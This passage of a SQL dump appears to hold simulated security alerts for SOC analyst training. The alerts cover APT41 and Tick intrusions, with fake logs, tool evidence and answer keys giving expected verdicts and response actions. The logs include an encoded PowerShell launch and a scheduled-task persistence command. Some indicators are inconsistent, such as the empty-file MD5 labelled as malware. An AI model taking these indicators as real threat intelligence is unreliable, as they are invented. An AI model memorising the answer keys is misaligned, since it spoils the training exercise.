'{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address used within the network.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.2.20\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Targeted game development server IP.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known APT41 malicious activity.\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP address linked to previous APT41 operations.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1130, 'Data Exfiltration Attempt', 'high', 'Data Loss Prevention (DLP) Systems', 'In a sophisticated data exfiltration attempt, attackers are trying to transfer sensitive data, including source code and user information, to an external server. The operation is attributed to APT41, known for using supply chain attacks and espionage techniques.', 'Exfiltration', 'T1048 - Exfiltration Over Alternative Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:45:27Z\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"203.0.113.45\",\"destination_port\":443,\"protocol\":\"HTTPS\",\"username\":\"jdoe\",\"filename\":\"confidential_data.zip\",\"file_hash\":\"3d2e4b9d5f6a7c8e9f0a1b2c3d4e5f6a7b8c9d0e\",\"action\":\"blocked\",\"message\":\"DLP detected and blocked an attempt to exfiltrate sensitive data to an external IP address.\",\"threat_actor\":\"APT41\"}', '2026-02-01 14:01:30', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"external_threat_intel\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with APT41 activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3d2e4b9d5f6a7c8e9f0a1b2c3d4e5f6a7b8c9d0e\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"malicious\",\"details\":\"File hash related to exfiltration tools used by APT41.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"confidential_data.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_scan\",\"verdict\":\"suspicious\",\"details\":\"Suspicious file involved in the exfiltration attempt.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.852Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:45:27Z\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"confidential_data.zip\\\",\\\"file_hash\\\":\\\"3d2e4b9d5f6a7c8e9f0a1b2c3d4e5f6a7b8c9d0e\\\",\\\"action\\\":\\\"blocked\\\",\\\"message\\\":\\\"DLP detected and blocked an attempt to exfiltrate sensitive data to an external IP address.\\\",\\\"threat_actor\\\":\\\"APT41\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.852Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:45:27Z\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"confidential_data.zip\\\",\\\"file_hash\\\":\\\"3d2e4b9d5f6a7c8e9f0a1b2c3d4e5f6a7b8c9d0e\\\",\\\"action\\\":\\\"blocked\\\",\\\"message\\\":\\\"DLP detected and blocked an attempt to exfiltrate sensitive data to an external IP address.\\\",\\\"threat_actor\\\":\\\"APT41\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.852Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:45:27Z\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"confidential_data.zip\\\",\\\"file_hash\\\":\\\"3d2e4b9d5f6a7c8e9f0a1b2c3d4e5f6a7b8c9d0e\\\",\\\"action\\\":\\\"blocked\\\",\\\"message\\\":\\\"DLP detected and blocked an attempt to exfiltrate sensitive data to an external IP address.\\\",\\\"threat_actor\\\":\\\"APT41\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.852Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:45:27Z\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"confidential_data.zip\\\",\\\"file_hash\\\":\\\"3d2e4b9d5f6a7c8e9f0a1b2c3d4e5f6a7b8c9d0e\\\",\\\"action\\\":\\\"blocked\\\",\\\"message\\\":\\\"DLP detected and blocked an attempt to exfiltrate sensitive data to an external IP address.\\\",\\\"threat_actor\\\":\\\"APT41\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.852Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:45:27Z\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"confidential_data.zip\\\",\\\"file_hash\\\":\\\"3d2e4b9d5f6a7c8e9f0a1b2c3d4e5f6a7b8c9d0e\\\",\\\"action\\\":\\\"blocked\\\",\\\"message\\\":\\\"DLP detected and blocked an attempt to exfiltrate sensitive data to an external IP address.\\\",\\\"threat_actor\\\":\\\"APT41\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1131, 'Suspicious Email with Daserf Payload', 'high', 'Email Gateway Logs', 'An employee received a phishing email containing a malicious attachment \'invoice_2023.docx\' which is designed to install the Daserf backdoor. This marks the initial access attempt by Tick APT.', 'Phishing', 'T1566.001', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-01T09:22:15Z\",\"email_id\":\"abc123xyz\",\"from\":\"attacker@example.com\",\"to\":\"employee@company.com\",\"subject\":\"Urgent: Invoice Attached\",\"attachment\":\"invoice_2023.docx\",\"attachment_hash\":\"f1e2d3c4b5a67890123456789abcdef123456789abcdef123456789abcdef1234\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.100\",\"user\":\"jdoe\",\"malware_family\":\"Daserf\"}', '2026-02-01 14:01:53', '2026-02-23 20:13:32', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"attacker@example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"Known phishing source, linked to previous campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple APT campaigns.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"f1e2d3c4b5a67890123456789abcdef123456789abcdef123456789abcdef1234\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Hash Registry\",\"verdict\":\"malicious\",\"details\":\"Hash identified as Daserf backdoor.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"invoice_2023.docx\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"Filename commonly used in phishing attempts.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"internal\",\"details\":\"Employee of the company.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Suspicious Email with Daserf Payload\",\"date\":\"2026-02-01T20:32:22.854Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1132, 'Execution of Daserf Backdoor', 'high', 'Endpoint Detection and Response (EDR)', 'The Daserf backdoor was executed on the target system, allowing attackers to establish control and prepare for further actions. This is a known APT tactic used to maintain persistence and facilitate further compromise.', 'Malware Execution', 'T1203: Exploitation for Client Execution', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-05T14:23:45Z\",\"event_id\":\"EDR-045672\",\"source_ip\":\"204.152.201.7\",\"destination_ip\":\"192.168.1.25\",\"username\":\"jdoe\",\"filename\":\"daserf.exe\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"process_id\":1345,\"process_name\":\"daserf.exe\",\"action\":\"execution\",\"status\":\"success\",\"malware_family\":\"Daserf\"}', '2026-02-01 14:01:53', '2026-02-23 20:14:46', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"204.152.201.7\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"This IP is associated with known APT activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP of affected endpoint.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"daserf.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Associated with Daserf backdoor.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash matches known malicious sample.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"User account on the affected system.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1133, 'Establishing Persistence Mechanisms', 'medium', 'Registry and Scheduled Tasks Logs', 'Tick APT employs persistence techniques, modifying registry entries and creating scheduled tasks to ensure continued access to the compromised system. The attacker created a new scheduled task and modified a registry entry to maintain access.', 'Persistence', 'T1053 - Scheduled Task/Job', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:33Z\",\"event_id\":4698,\"task_name\":\"\\\\Microsoft\\\\Windows\\\\Update\\\\CriticalUpdate\",\"task_content\":{\"author\":\"SYSTEM\",\"schedule\":\"Daily\",\"time\":\"02:00\",\"action_type\":\"Start a Program\",\"program\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"arguments\":\"/c powershell.exe -ExecutionPolicy Bypass -File C:\\\\Scripts\\\\maintain_access.ps1\"},\"registry_modification\":{\"key_path\":\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\",\"value_name\":\"UpdateService\",\"value_type\":\"REG_SZ\",\"value_data\":\"C:\\\\ProgramData\\\\UpdateService.exe\"},\"src_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.105\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"user\":\"admin_user\"}', '2026-02-01 14:01:53', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known Tick APT activity.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal network IP.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash recognized as a malicious file related to persistence mechanisms.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.857Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:33Z\\\",\\\"event_id\\\":4698,\\\"task_name\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\Update\\\\\\\\CriticalUpdate\\\",\\\"task_content\\\":{\\\"author\\\":\\\"SYSTEM\\\",\\\"schedule\\\":\\\"Daily\\\",\\\"time\\\":\\\"02:00\\\",\\\"action_type\\\":\\\"Start a Program\\\",\\\"program\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe\\\",\\\"arguments\\\":\\\"/c powershell.exe -ExecutionPolicy Bypass -File C:\\\\\\\\Scripts\\\\\\\\maintain_access.ps1\\\"},\\\"registry_modification\\\":{\\\"key_path\\\":\\\"HKLM\\\\\\\\SOFTWARE\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"value_name\\\":\\\"UpdateService\\\",\\\"value_type\\\":\\\"REG_SZ\\\",\\\"value_data\\\":\\\"C:\\\\\\\\ProgramData\\\\\\\\UpdateService.exe\\\"},\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.105\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user\\\":\\\"admin_user\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.857Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:33Z\\\",\\\"event_id\\\":4698,\\\"task_name\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\Update\\\\\\\\CriticalUpdate\\\",\\\"task_content\\\":{\\\"author\\\":\\\"SYSTEM\\\",\\\"schedule\\\":\\\"Daily\\\",\\\"time\\\":\\\"02:00\\\",\\\"action_type\\\":\\\"Start a Program\\\",\\\"program\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe\\\",\\\"arguments\\\":\\\"/c powershell.exe -ExecutionPolicy Bypass -File C:\\\\\\\\Scripts\\\\\\\\maintain_access.ps1\\\"},\\\"registry_modification\\\":{\\\"key_path\\\":\\\"HKLM\\\\\\\\SOFTWARE\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"value_name\\\":\\\"UpdateService\\\",\\\"value_type\\\":\\\"REG_SZ\\\",\\\"value_data\\\":\\\"C:\\\\\\\\ProgramData\\\\\\\\UpdateService.exe\\\"},\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.105\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user\\\":\\\"admin_user\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.857Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:33Z\\\",\\\"event_id\\\":4698,\\\"task_name\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\Update\\\\\\\\CriticalUpdate\\\",\\\"task_content\\\":{\\\"author\\\":\\\"SYSTEM\\\",\\\"schedule\\\":\\\"Daily\\\",\\\"time\\\":\\\"02:00\\\",\\\"action_type\\\":\\\"Start a Program\\\",\\\"program\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe\\\",\\\"arguments\\\":\\\"/c powershell.exe -ExecutionPolicy Bypass -File C:\\\\\\\\Scripts\\\\\\\\maintain_access.ps1\\\"},\\\"registry_modification\\\":{\\\"key_path\\\":\\\"HKLM\\\\\\\\SOFTWARE\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"value_name\\\":\\\"UpdateService\\\",\\\"value_type\\\":\\\"REG_SZ\\\",\\\"value_data\\\":\\\"C:\\\\\\\\ProgramData\\\\\\\\UpdateService.exe\\\"},\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.105\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user\\\":\\\"admin_user\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.857Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:33Z\\\",\\\"event_id\\\":4698,\\\"task_name\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\Update\\\\\\\\CriticalUpdate\\\",\\\"task_content\\\":{\\\"author\\\":\\\"SYSTEM\\\",\\\"schedule\\\":\\\"Daily\\\",\\\"time\\\":\\\"02:00\\\",\\\"action_type\\\":\\\"Start a Program\\\",\\\"program\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe\\\",\\\"arguments\\\":\\\"/c powershell.exe -ExecutionPolicy Bypass -File C:\\\\\\\\Scripts\\\\\\\\maintain_access.ps1\\\"},\\\"registry_modification\\\":{\\\"key_path\\\":\\\"HKLM\\\\\\\\SOFTWARE\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"value_name\\\":\\\"UpdateService\\\",\\\"value_type\\\":\\\"REG_SZ\\\",\\\"value_data\\\":\\\"C:\\\\\\\\ProgramData\\\\\\\\UpdateService.exe\\\"},\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.105\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user\\\":\\\"admin_user\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.857Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:33Z\\\",\\\"event_id\\\":4698,\\\"task_name\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\Update\\\\\\\\CriticalUpdate\\\",\\\"task_content\\\":{\\\"author\\\":\\\"SYSTEM\\\",\\\"schedule\\\":\\\"Daily\\\",\\\"time\\\":\\\"02:00\\\",\\\"action_type\\\":\\\"Start a Program\\\",\\\"program\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe\\\",\\\"arguments\\\":\\\"/c powershell.exe -ExecutionPolicy Bypass -File C:\\\\\\\\Scripts\\\\\\\\maintain_access.ps1\\\"},\\\"registry_modification\\\":{\\\"key_path\\\":\\\"HKLM\\\\\\\\SOFTWARE\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"value_name\\\":\\\"UpdateService\\\",\\\"value_type\\\":\\\"REG_SZ\\\",\\\"value_data\\\":\\\"C:\\\\\\\\ProgramData\\\\\\\\UpdateService.exe\\\"},\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.105\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user\\\":\\\"admin_user\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1134, 'Lateral Movement within Network', 'high', 'Network Traffic Analysis', 'The Daserf backdoor was used to move laterally within the network from compromised host 192.168.1.15 to target host 192.168.1.25. The attacker established a connection from external IP 203.0.113.45, executing the malicious payload identified by hash d41d8cd98f00b204e9800998ecf8427e. The attacker aims to expand their network foothold by accessing additional systems.', 'Lateral Movement', 'T1078: Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:09Z\",\"src_ip\":\"192.168.1.15\",\"dst_ip\":\"192.168.1.25\",\"external_ip\":\"203.0.113.45\",\"malware_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"event_type\":\"lateral_movement\",\"malware_name\":\"Daserf\",\"user\":\"attacker_user\",\"filename\":\"payload.exe\"}', '2026-02-01 14:01:53', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Source host within the organization.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Target host within the organization.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"External Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with prior attacks.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to Daserf backdoor payload.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1135, 'Data Exfiltration Detected', 'critical', 'Data Loss Prevention (DLP) Systems', 'Sensitive data related to defense and aerospace technologies is being exfiltrated by the Tick APT group. Anomalous data transfers to an external IP have been detected, indicating potential data theft.', 'Data Exfiltration', 'T1020 (Data Transfer Size Limits)', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-20T14:05:32Z\",\"event_id\":\"DLP123456\",\"source_ip\":\"192.168.1.25\",\"destination_ip\":\"203.0.113.45\",\"user\":\"jdoe\",\"file_name\":\"classified_defense_project_v2.pdf\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"protocol\":\"HTTPS\",\"action\":\"allowed\",\"bytes_transferred\":10485760,\"dlp_policy\":\"Sensitive Data Movement\",\"dlp_rule\":\"Defense & Aerospace Keywords\"}', '2026-02-01 14:01:53', '2026-02-16 17:49:30', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"external_ip_database\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with cyber espionage activities.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"classified_defense_project_v2.pdf\",\"is_critical\":false,\"osint_result\":{\"source\":\"file_reputation_service\",\"verdict\":\"suspicious\",\"details\":\"Contains classified keywords related to defense and 